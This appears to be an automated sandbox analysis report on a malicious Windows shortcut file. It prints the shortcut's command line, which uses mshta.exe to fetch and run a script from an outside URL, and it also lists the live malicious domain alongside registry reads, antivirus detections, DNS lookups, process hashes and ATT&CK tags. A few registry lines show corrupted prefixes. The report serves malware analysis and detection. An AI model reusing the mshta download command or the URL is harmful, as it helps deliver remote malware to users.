HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Face
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Disable Visited Hyperlinks
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Use Anchor Hover Color
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\MiscFlags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Allow Programmatic Cut_Copy_Paste
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup\Print_Background
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSizePrivate
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFixedFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESerifFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESansSerifFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEUIFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AcceptLanguage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\IE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\VML
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\WindowsEdition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\text/xml\CLSID
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FromCacheTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
\x5f28hEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableKeepAlive
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IdnEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreConnectLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreResolveLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SqmHttpStreamRandomUploadPoolSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CacheMode
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
\x7f28hEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBasicOverClearChannel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ClientAuthBuiltInUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisplayScriptDownloadFailureUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSServername
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UTF8ServerNameRes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableReadRange
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketSendBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketReceiveBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\KeepAliveTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxHttpRedirects
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ServerInfoTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableNTLMPreAuth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ScavengeCacheLowerBound
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertCacheNoValidate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLifeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HttpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FtpDefaultExpiryTimeSecs
\x7e60\xa7EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\LeashLegacyCookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendExtraCRLF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WpadSearchAllDomains
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MimeExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HeaderExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheTimeout
\x7e60\xa7EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnAlwaysOnPost
\x7e60\xa7EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnZoneCrossing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnBadCertRecving
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AlwaysDrainOnRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableLegacyAutoProxyFeatures
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BadProxyExpiresTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
"C:\Windows\System32\msHta.Exe" http://www.d01fa.net/images/D817583E/16364/11542/9f9d51bf/b0bdc66
C:\Users\Rebecca\AppData\Local\Temp\file.lnk
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
CicLoadWinStaWinSta0
Local\MSCTF.CtfMonitorInstMutexDefault1
!IECompat!Mutex

Flags

Icon ..\..\..\Windows\System32\cftmo.exe
CMD line http://www.d01fa.net/images/D817583E/16364/11542/9f9d51bf/b0bdc66
Icon %SystemRoot%\system32\SHELL32.dll

Windows
System32
cftmo.exe
C:\Windows\System32\cftmo.exe
%windir%\system32\cftmo.exe
1SPS0
user-pc
Windows
System32
msHta.Exe
#..\..\..\Windows\System32\cftmo.exe
%windir%Ahttp://www.d01fa.net/images/D817583E/16364/11542/9f9d51bf/b0bdc66!%SystemRoot%\system32\SHELL32.dll
%windir%\system32\cftmo.exe
cftmo.exe
Application
S-1-5-21-2108907110-3666731302-1928028421-1000
System32 (C:\Windows)
C:\Windows\System32\cftmo.exe

Full Results

Engine Signature
Bkav Clean
MicroWorld-eScan Heur.BZC.YAX.Nioc.1.0443ACBC
CMC Clean
CAT-QuickHeal Clean
McAfee LNK/Agent-FSDJ!0D928D046310
Malwarebytes Clean
VIPRE Clean
K7AntiVirus Clean
K7GW Clean
Arcabit Clean
BitDefenderTheta Clean
Cyren LNK/Trojan.MQII-5
Symantec Trojan.Gen.MBT
ESET-NOD32 Clean
Baidu Clean
TrendMicro-HouseCall TROJ_FRS.VSNTD720
Avast Other:Malware-gen [Trj]
ClamAV Clean
Kaspersky HEUR:Trojan.WinLNK.Agent.gen
BitDefender Heur.BZC.YAX.Nioc.1.0443ACBC
NANO-Antivirus Clean
ViRobot Clean
AegisLab Trojan.WinLNK.Acbc.4!c
Rising Downloader.Mshta/LNK!1.BADA (CLASSIC)
Ad-Aware Heur.BZC.YAX.Nioc.1.0443ACBC
Emsisoft Heur.BZC.YAX.Nioc.1.0443ACBC (B)
Comodo Clean
F-Secure Clean
DrWeb Trojan.DownLoader33.28040
Zillya Clean
TrendMicro TROJ_FRS.VSNTD720
McAfee-GW-Edition LNK/Agent-FSDJ!0D928D046310
FireEye Heur.BZC.YAX.Nioc.1.0443ACBC
Sophos Troj/DownLnk-X
F-Prot LNK/Trojan.MQII-5
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Microsoft Trojan:Win32/Casdet!rfn
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.WinLNK.Agent.gen
Avast-Mobile Clean
GData Heur.BZC.YAX.Nioc.1.0443ACBC
AhnLab-V3 Clean
ALYac Trojan.Downloader.LnK.Gen
MAX malware (ai score=98)
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet LNK/DownLnk.X!tr
AVG Other:Malware-gen [Trj]
Panda Clean
Qihoo-360 Generic/Trojan.066
Sorry! No behavior.

Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
Y 1.1.1.1 [VT] Australia

TCP

No TCP connections recorded.

UDP

Source Source Port Destination Destination Port
192.168.1.5 54312 1.1.1.1 53
192.168.1.5 54724 1.1.1.1 53
192.168.1.5 63931 1.1.1.1 53
192.168.1.5 137 192.168.1.255 137
192.168.1.5 54312 8.8.8.8 53
192.168.1.5 54724 8.8.8.8 53
192.168.1.5 63931 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
www.d01fa.net [VT] 5.181.156.24 [VT]

HTTP Requests

No HTTP requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

Sorry! No dropped files.
Sorry! No CAPE files.
Process Name mshta.exe
PID 5120
Dump Size 13312 bytes
Module Path C:\Windows\System32\mshta.exe
Type PE image: 32-bit executable
PE timestamp 2013-10-14 05:50:08
MD5 57c57002383a5458380fb43b2dd8b699
SHA1 28b82159c9ec2ed66ae4bf2765131711d68104a6
SHA256 8f2accd8b885e059adaedd8d84f623fba3fc92967dda1b44432412cff3403138
CRC32 D49D1B5E
Ssdeep 192:iHr74pcC1NTEH1eeO+T1MYDJWwelJIRBU:2oYelsWw6
Dump Filename 8f2accd8b885e059adaedd8d84f623fba3fc92967dda1b44432412cff3403138

Process Name cmd.exe
PID 5152
Dump Size 302592 bytes
Module Path C:\Windows\System32\cmd.exe
Type PE image: 32-bit executable
PE timestamp 2010-11-20 09:00:27
MD5 c6b52ec2c8ecd7d69b713ce7ce3f3322
SHA1 b007ffa155c6362a49f72a6ea9ea168e72d2cb99
SHA256 31eb1439b01d1a43d16a05b3b1de955ce471eccf154b11088be4eecb7f0dad44
CRC32 F6361BA8
Ssdeep 3072:5H4NFuPLj3Cs8ZJ48kaunIDTcERYrxYVb/ToAkgjyGez1c:l4nuvCVmKncE6MbcAkgmt+
Dump Filename 31eb1439b01d1a43d16a05b3b1de955ce471eccf154b11088be4eecb7f0dad44

Defense Evasion
  • T1064 - Scripting
    • Signature - script_network_activity

Execution
  • T1064 - Scripting
    • Signature - script_network_activity
